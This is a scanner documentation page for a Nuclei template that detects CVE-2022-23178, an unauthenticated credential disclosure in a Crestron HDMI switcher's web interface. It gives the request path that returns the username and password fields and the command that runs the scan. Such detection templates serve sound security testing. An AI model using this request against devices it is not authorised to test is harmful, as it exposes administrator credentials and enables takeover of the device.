Crestron Device - Credentials Disclosure
ID: CVE-2022-23178
Severity: critical
Author: gy741
Tags: cve,cve2022,crestron,disclosure
Description
Section titled “Description”An issue was discovered on Crestron HD-MD4X2-4K-E 1.0.0.2159 devices. When the administrative web interface of the HDMI switcher is accessed unauthenticated, user credentials are disclosed that are valid to authenticate to the web interface. Specifically, aj.html sends a JSON document with uname and upassword fields.
YAML Source
Section titled “YAML Source”id: CVE-2022-23178
info: name: Crestron Device - Credentials Disclosure author: gy741 severity: critical description: An issue was discovered on Crestron HD-MD4X2-4K-E 1.0.0.2159 devices. When the administrative web interface of the HDMI switcher is accessed unauthenticated, user credentials are disclosed that are valid to authenticate to the web interface. Specifically, aj.html sends a JSON document with uname and upassword fields. impact: | An attacker can obtain sensitive credentials, leading to unauthorized access and potential compromise of the device. remediation: | Update the Crestron Device firmware to the latest version to mitigate the vulnerability. reference: - https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-009/-credential-disclosure-in-web-interface-of-crestron-device - https://nvd.nist.gov/vuln/detail/CVE-2022-23178 - https://de.crestron.com/Products/Video/HDMI-Solutions/HDMI-Switchers/HD-MD4X2-4K-E - https://www.redteam-pentesting.de/advisories/rt-sa-2021-009 - https://github.com/Threekiii/Awesome-POC classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-23178 cwe-id: CWE-287 epss-score: 0.03228 epss-percentile: 0.91216 cpe: cpe:2.3:o:crestron:hd-md4x2-4k-e_firmware:1.0.0.2159:*:*:*:*:*:*:* metadata: max-request: 1 vendor: crestron product: hd-md4x2-4k-e_firmware tags: cve,cve2022,crestron,disclosure
http: - method: GET path: - "{{BaseURL}}/aj.html?a=devi"
matchers-condition: and matchers: - type: word part: body words: - '"uname":' - '"upassword":' condition: and
- type: status status: - 200# digest: 490a0046304402203ca8ae278054dd38e6002f77acbfe62bcd616ffa3144234d16603800513a147002207feaa1e2960b808ba7ac26c80507a437c1a581c2a392441b1c2b1c89a1791f5d:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-23178.yaml"